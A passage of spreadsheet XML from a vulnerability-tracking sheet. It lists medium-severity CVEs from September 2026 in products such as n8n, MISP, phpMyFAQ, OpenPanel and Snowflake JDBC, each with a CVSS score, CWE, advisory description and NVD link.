          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5238" s="5" t="inlineStr"/>
      <c r="F5238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5238" s="5" t="inlineStr"/>
      <c r="H5238" s="5" t="inlineStr"/>
      <c r="I5238" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5238" s="5" t="inlineStr"/>
      <c r="K5238" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5238" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.36.2 contain a missing per-project authorization vulnerability in the Insights API routes that allows authenticated users with insights scopes to access workflow names and execution statistics across projects. Attackers can supply arbitrary projectId parameters to retrieve sensitive project and workflow information from projects they have no membership in.</t>
        </is>
      </c>
      <c r="M5238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85173</t>
        </is>
      </c>
    </row>
    <row r="5239">
      <c r="A5239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85210</t>
        </is>
      </c>
      <c r="C5239" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5239" s="5" t="inlineStr"/>
      <c r="F5239" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5239" s="5" t="inlineStr"/>
      <c r="H5239" s="5" t="inlineStr"/>
      <c r="I5239" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5239" s="5" t="inlineStr"/>
      <c r="K5239" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5239" s="5" t="inlineStr">
        <is>
          <t>Oppia's AdminRoleHandler GET endpoint in core/controllers/admin.py is decorated with open_access, allowing any registered user to enumerate privileged accounts and roles. Attackers can query the endpoint with filter_criterion parameters to retrieve usernames holding specific roles, banned flags, and managed topic identifiers without authorization.</t>
        </is>
      </c>
      <c r="M5239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85210</t>
        </is>
      </c>
    </row>
    <row r="5240">
      <c r="A5240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85226</t>
        </is>
      </c>
      <c r="C5240" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5240" s="5" t="inlineStr"/>
      <c r="F5240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5240" s="5" t="inlineStr"/>
      <c r="H5240" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5240" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5240" s="5" t="inlineStr"/>
      <c r="K5240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5240" s="5" t="inlineStr">
        <is>
          <t>MISP contains an authorization flaw in the OnDemand correlation engine where correlations were calculated solely from matching attribute values without applying the distribution, sharing group, organization, or other access-control restrictions associated with the correlated attributes and events. As a result, an authenticated user could receive correlation results referring to attributes or events that the user was not authorized to access. 
The vulnerable correlation collection path did not take the requesting user into account. The patch changes the correlation collector to accept the current user and filters the resulting attribute identifiers through MISP's existing fetchAttributesSimple() authorization logic, which evaluates event-, attribute-, object-, distribution-, and sharing-group-level restrictions against the live data.  
The issue also affected paths relying on previously stored correlation data. Because the OnDemand engine does not maintain the stored correlation table, its denormalized access-control information could be stale. The patch therefore validates correlated attribute identifiers against the current ACLs before returning them and additionally applies normal event visibility conditions when retrieving related events.  
An authenticated low-privileged user could exploit this issue by querying or creating attributes that correlate with restricted MISP content, potentially learning information about otherwise inaccessible events or attributes.</t>
        </is>
      </c>
      <c r="M5240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85226</t>
        </is>
      </c>
    </row>
    <row r="5241">
      <c r="A5241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85230</t>
        </is>
      </c>
      <c r="C5241" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5241" s="5" t="inlineStr"/>
      <c r="F5241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5241" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5241" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5241" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5241" s="5" t="inlineStr"/>
      <c r="K5241" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L5241" s="5" t="inlineStr">
        <is>
          <t>A persistent unsafe URL injection vulnerability exists in the MISP dashboard ButtonWidget configuration. Dashboard widget URLs were validated only when the widget was rendered and were not validated when the configuration was saved. As a result, an authenticated user able to modify dashboard widget settings could persist arbitrary URL values, including URLs using the javascript: scheme, through either of the dashboard settings persistence paths.
A malicious javascript: URL stored in a dashboard button could potentially result in client-side script execution in the MISP security context if the value reached a rendering or navigation path without the existing runtime validation. Such execution could allow an attacker to perform actions with the privileges of the affected user or access information available to their MISP session.
The practical exploitability of this issue is reduced by the fact that MISP already applied URL validation at render time, which neutralized known malicious values before they were presented to the user. The vulnerability therefore represents a persistence-layer validation gap and a defense-in-depth weakness rather than evidence of a direct bypass of the existing rendering protection.
The patch introduces a canonical url schema type and validates dashboard widget configuration before it is persisted through either settings save mechanism. ButtonWidget URLs must now be strings resolving to an absolute path on the current MISP instance or a full URL with the same origin. Values using javascript:, external origins, malformed URL forms, and non-string values are rejected at save time.</t>
        </is>
      </c>
      <c r="M5241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85230</t>
        </is>
      </c>
    </row>
    <row r="5242">
      <c r="A5242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85392</t>
        </is>
      </c>
      <c r="C5242" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5242" s="5" t="inlineStr"/>
      <c r="F5242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5242" s="5" t="inlineStr"/>
      <c r="H5242" s="5" t="inlineStr"/>
      <c r="I5242" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5242" s="5" t="inlineStr"/>
      <c r="K5242" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5242" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains an authorization bypass vulnerability in the GET /api/v1/auth/user/:id/logout endpoint that allows authenticated attackers to delete sessions for any user by supplying arbitrary user IDs. Attackers can forcibly log out any user including administrators by calling the logout handler with another user's ID, since the endpoint performs no authorization checks to verify the caller owns the target account.</t>
        </is>
      </c>
      <c r="M5242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85392</t>
        </is>
      </c>
    </row>
    <row r="5243">
      <c r="A5243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85453</t>
        </is>
      </c>
      <c r="C5243" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5243" s="5" t="inlineStr"/>
      <c r="F5243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5243" s="5" t="inlineStr"/>
      <c r="H5243" s="5" t="inlineStr"/>
      <c r="I5243" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5243" s="5" t="inlineStr"/>
      <c r="K5243" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5243" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to escape database contents when rendering MOOSDB HTTP pages, allowing attackers to inject malicious scripts. Any MOOS publisher can set variable values containing script payloads that execute in the browser of operators viewing the web interface.</t>
        </is>
      </c>
      <c r="M5243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85453</t>
        </is>
      </c>
    </row>
    <row r="5244">
      <c r="A5244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85528</t>
        </is>
      </c>
      <c r="C5244" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5244" s="5" t="inlineStr"/>
      <c r="F5244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5244" s="5" t="inlineStr"/>
      <c r="H5244" s="5" t="inlineStr"/>
      <c r="I5244" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5244" s="5" t="inlineStr"/>
      <c r="K5244" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L5244" s="5" t="inlineStr">
        <is>
          <t>Improper input validation of the auto-configuration account identifier in Snowflake JDBC Driver versions 4.2.0 through 4.3.3 allowed a credential-bearing login request to be redirected to an attacker-selected HTTPS endpoint. An attacker able to control the account value could cause the driver to transmit a reusable login credential to a host of their choosing and replay it to obtain the privileges granted to that credential. Successful exploitation requires an application using jdbc:snowflake:auto with a connections.toml section that omits an explicit host and a lower-trust principal able to set the account value; ordinary JDBC URLs are unaffected. The fix is available in Snowflake JDBC Driver version 4.3.4, including the snowflake-jdbc-fips and snowflake-jdbc-thin. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M5244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85528</t>
        </is>
      </c>
    </row>
    <row r="5245">
      <c r="A5245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85577</t>
        </is>
      </c>
      <c r="C5245" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5245" s="5" t="inlineStr"/>
      <c r="F5245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5245" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5245" s="5" t="inlineStr"/>
      <c r="I5245" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5245" s="5" t="inlineStr"/>
      <c r="K5245" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5245" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php that allows unauthenticated attackers to inject arbitrary JavaScript by closing the script tag with &lt;/script&gt;. Attackers can craft a malicious URL with an error parameter containing script breakout sequences to execute arbitrary JavaScript in the victim's browser context on the login page.</t>
        </is>
      </c>
      <c r="M5245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85577</t>
        </is>
      </c>
    </row>
    <row r="5246">
      <c r="A5246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85579</t>
        </is>
      </c>
      <c r="C5246" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5246" s="5" t="inlineStr"/>
      <c r="F5246" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5246" s="5" t="inlineStr"/>
      <c r="H5246" s="5" t="inlineStr"/>
      <c r="I5246" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5246" s="5" t="inlineStr"/>
      <c r="K5246" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5246" s="5" t="inlineStr">
        <is>
          <t>SiYuan is affected by an information disclosure vulnerability (confirmed in v3.8.1, fixed in v3.8.2) in the reader-accessible POST /api/transactions/undoState endpoint. The endpoint returns the peekMutatedRootIDs list from the global undo-log stack for a caller-supplied root ID without applying publish-access visibility filtering. An authenticated reader who knows the root ID of a visible document can obtain the internal root IDs of other documents (including private or unpublished ones) modified in the same cross-document transaction, disclosing internal identifiers and cross-document relationships. Document body contents are not directly exposed.</t>
        </is>
      </c>
      <c r="M5246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85579</t>
        </is>
      </c>
    </row>
    <row r="5247">
      <c r="A5247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85587</t>
        </is>
      </c>
      <c r="C5247" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5247" s="5" t="inlineStr"/>
      <c r="F5247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5247" s="5" t="inlineStr"/>
      <c r="H5247" s="5" t="inlineStr"/>
      <c r="I5247" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5247" s="5" t="inlineStr"/>
      <c r="K5247" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5247" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.1.8 enforces incorrect permission checks on admin content pages, allowing lesser-privileged editors to read draft and inactive content. Attackers with only add permissions can access news edit and FAQ translate endpoints to view unpublished content invisible to the public.</t>
        </is>
      </c>
      <c r="M5247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85587</t>
        </is>
      </c>
    </row>
    <row r="5248">
      <c r="A5248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85588</t>
        </is>
      </c>
      <c r="C5248" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5248" s="5" t="inlineStr"/>
      <c r="F5248" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5248" s="5" t="inlineStr"/>
      <c r="H5248" s="5" t="inlineStr"/>
      <c r="I5248" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5248" s="5" t="inlineStr"/>
      <c r="K5248" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5248" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 include live TOTP shared secrets in plaintext within user data export ZIP files. Attackers obtaining exported archives can extract the TOTP seed and generate valid one-time codes to bypass two-factor authentication.</t>
        </is>
      </c>
      <c r="M5248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85588</t>
        </is>
      </c>
    </row>
    <row r="5249">
      <c r="A5249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85589</t>
        </is>
      </c>
      <c r="C5249" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5249" s="5" t="inlineStr"/>
      <c r="F5249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5249" s="5" t="inlineStr"/>
      <c r="H5249" s="5" t="inlineStr"/>
      <c r="I5249" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5249" s="5" t="inlineStr"/>
      <c r="K5249" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5249" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.2.0-alpha.2 contains a missing authorization vulnerability in the admin dashboard API endpoints searches and content-health that enforce only authentication without permission checks. Any authenticated user can access these endpoints to read site-wide search statistics and content-health counters regardless of their privilege level.</t>
        </is>
      </c>
      <c r="M5249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85589</t>
        </is>
      </c>
    </row>
    <row r="5250">
      <c r="A5250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85611</t>
        </is>
      </c>
      <c r="C5250" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5250" s="5" t="inlineStr"/>
      <c r="F5250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5250" s="5" t="inlineStr"/>
      <c r="H5250" s="5" t="inlineStr"/>
      <c r="I5250" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5250" s="5" t="inlineStr"/>
      <c r="K5250" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5250" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains a cross-tenant broken object level authorization vulnerability in the report.getLayouts and report.resetLayout tRPC procedures that fail to scope dashboard queries to the caller's project. Authenticated attackers can supply their own projectId with a victim organization's guessable dashboardId to read confidential report definitions or permanently delete dashboard layouts across tenant boundaries.</t>
        </is>
      </c>
      <c r="M5250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85611</t>
        </is>
      </c>
    </row>
    <row r="5251">
      <c r="A5251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85615</t>
        </is>
      </c>
      <c r="C5251" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5251" s="5" t="inlineStr"/>
      <c r="F5251" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5251" s="5" t="inlineStr"/>
      <c r="H5251" s="5" t="inlineStr"/>
      <c r="I5251" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5251" s="5" t="inlineStr"/>
      <c r="K5251" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5251" s="5" t="inlineStr">
        <is>
          <t>Openpanel before 2.3.0 contains an insecure direct object reference vulnerability in the report.getLayouts and report.resetLayout tRPC procedures that fail to bind dashboardId to the authorized projectId. Authenticated attackers can supply an arbitrary victim dashboardId with their own projectId to read report layouts and configurations or delete dashboard grid arrangements across tenants.</t>
        </is>
      </c>
      <c r="M5251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85615</t>
        </is>
      </c>
    </row>
    <row r="5252">
      <c r="A5252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86100</t>
        </is>
      </c>
      <c r="C5252" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5252" s="5" t="inlineStr"/>
      <c r="F5252" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5252" s="5" t="inlineStr"/>
      <c r="H5252" s="5" t="inlineStr"/>
      <c r="I5252" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5252" s="5" t="inlineStr"/>
      <c r="K5252" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5252" s="5" t="inlineStr">
        <is>
          <t>Camaleon CMS versions 2.7.5 through 2.9.1 fail to validate redirect targets when fetching remote files in the Upload from URL media feature. Authenticated attackers can supply URLs that pass initial validation but redirect to internal network addresses, allowing server-side request forgery to internal services.</t>
        </is>
      </c>
      <c r="M5252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86100</t>
        </is>
      </c>
    </row>
    <row r="5253">
      <c r="A5253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86112</t>
        </is>
      </c>
      <c r="C5253" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5253" s="5" t="inlineStr"/>
      <c r="F5253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5253" s="5" t="inlineStr"/>
      <c r="H5253" s="5" t="inlineStr"/>
      <c r="I5253" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5253" s="5" t="inlineStr"/>
      <c r="K5253" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5253" s="5" t="inlineStr">
        <is>
          <t>BookWyrm through 0.9.1 fails to validate user visibility permissions in the Favorite and Unfavorite views, allowing authenticated attackers to favorite or unfavorite followers-only and direct statuses they cannot access. Attackers can POST to the favorite endpoint with a status ID to create unauthorized interactions, trigger ActivityPub broadcasts, and enumerate private status IDs through response differentiation.</t>
        </is>
      </c>
      <c r="M5253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86112</t>
        </is>
      </c>
    </row>
    <row r="5254">
      <c r="A5254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86115</t>
        </is>
      </c>
      <c r="C5254" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5254" s="5" t="inlineStr"/>
      <c r="F5254" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5254" s="5" t="inlineStr"/>
      <c r="H5254" s="5" t="inlineStr"/>
      <c r="I5254" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5254" s="5" t="inlineStr"/>
      <c r="K5254" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L5254" s="5" t="inlineStr">
        <is>
          <t>Sim before 0.8.14 classifies tool requests as internal based on URL prefix matching without scheme normalization, skipping SSRF validation and minting internal authentication tokens. Authenticated workflow authors can bypass external URL validation by supplying paths starting with /api/ in HTTP blocks to reach internal-only endpoints like POST /api/function/execute.</t>
        </is>
      </c>
      <c r="M5254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86115</t>
        </is>
      </c>
    </row>
    <row r="5255">
      <c r="A5255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86118</t>
        </is>
      </c>
      <c r="C5255" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5255" s="5" t="inlineStr"/>
      <c r="F5255" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5255" s="5" t="inlineStr"/>
      <c r="H5255" s="5" t="inlineStr"/>
      <c r="I5255" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5255" s="5" t="inlineStr"/>
      <c r="K5255" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5255" s="5" t="inlineStr">
        <is>
          <t>gonic versions before 0.22.0 fail to validate administrator privileges in the startScan endpoint, allowing any authenticated user to trigger media library rescans. Attackers can repeatedly call the startScan endpoint to force CPU and I/O-intensive filesystem operations, causing denial of service on multi-user instances.</t>
        </is>
      </c>
      <c r="M5255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86118</t>
        </is>
      </c>
    </row>
    <row r="5256">
      <c r="A5256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86120</t>
        </is>
      </c>
      <c r="C5256" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5256" s="5" t="inlineStr"/>
      <c r="F5256" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5256" s="5" t="inlineStr"/>
      <c r="H5256" s="5" t="inlineStr"/>
      <c r="I5256" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5256" s="5" t="inlineStr"/>
      <c r="K5256" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="L5256" s="5" t="inlineStr">
        <is>
          <t>APITable through 1.13.0-beta.1 contains an incorrect authorization vulnerability in NodePermissionGuard that fails to enforce node-level access control when permission lookups throw exceptions. Attackers with valid Fusion API tokens can write attachments to private datasheets they have been explicitly denied access to by exploiting the unhandled exception in the permission guard.</t>
        </is>
      </c>
      <c r="M5256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86120</t>
        </is>
      </c>
    </row>
    <row r="5257">
      <c r="A5257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86122</t>
        </is>
      </c>
      <c r="C5257" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5257" s="5" t="inlineStr"/>
      <c r="F5257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5257" s="5" t="inlineStr"/>
      <c r="H5257" s="5" t="inlineStr"/>
      <c r="I5257" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5257" s="5" t="inlineStr"/>
      <c r="K5257" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5257" s="5" t="inlineStr">
        <is>
          <t>Rowboat through 0.9.1 fails to validate custom MCP server and webhook URLs, allowing authenticated users to configure arbitrary destinations. Attackers can point these URLs at internal services and cloud metadata endpoints to perform server-side request forgery and enumerate internal network topology.</t>
        </is>
      </c>
      <c r="M5257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86122</t>
        </is>
      </c>
    </row>
    <row r="5258">
      <c r="A5258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86174</t>
        </is>
      </c>
      <c r="C5258" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5258" s="5" t="inlineStr"/>
      <c r="F5258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5258" s="5" t="inlineStr"/>
      <c r="H5258" s="5" t="inlineStr"/>
      <c r="I5258" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5258" s="5" t="inlineStr"/>
      <c r="K5258" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5258" s="5" t="inlineStr">
        <is>
          <t>Plane through 1.4.2 fails to validate that issues belong to the deploy board's project in the public comment endpoint. Authenticated attackers can post comments to arbitrary issues across workspaces by supplying an issue_id parameter to the public deploy-board comment endpoint.</t>
        </is>
      </c>
      <c r="M5258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86174</t>
        </is>
      </c>
    </row>
    <row r="5259">
      <c r="A5259" s="5" t="inlineStr">
        <is>
